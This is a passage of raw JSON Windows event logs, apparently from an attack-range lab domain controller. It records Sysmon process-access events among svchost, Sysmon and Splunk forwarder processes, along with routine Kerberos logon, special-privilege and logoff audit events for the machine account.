C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:36.048","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2793,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:36.048\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:36.048","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2794,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:36.048\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:36.048","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2795,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:36.048\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FBC-5F25-0000-001040E70400}\r\nTargetProcessId: 4536\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:36.048","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FBC-5F25-0000-001040E70400}","TargetProcessId":"4536","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2796,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:36.189\r\nSourceProcessGUID: {41C8662E-1FBC-5F25-0000-001040E70400}\r\nSourceProcessId: 4536\r\nSourceThreadId: 4532\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nTargetProcessId: 2488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:36.189","SourceProcessGUID":"{41C8662E-1FBC-5F25-0000-001040E70400}","SourceProcessId":"4536","SourceThreadId":"4532","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","TargetProcessId":"2488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220391,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4E979\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x4e979","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:54:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220392,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x4E979\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t50083\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x4e979","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"50083","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:54:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220393,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4E9C2\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x4e9c2","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:54:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220394,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x4E9C2\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t50084\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x4e9c2","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"50084","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:54:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220395,"ProcessID":864,"ThreadID":3836,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4E9C2\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x4e9c2","LogonType":"3","EventReceivedTime":"2020-08-01 07:54:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220396,"ProcessID":864,"ThreadID":1560,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4EACF\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x4eacf","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:54:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
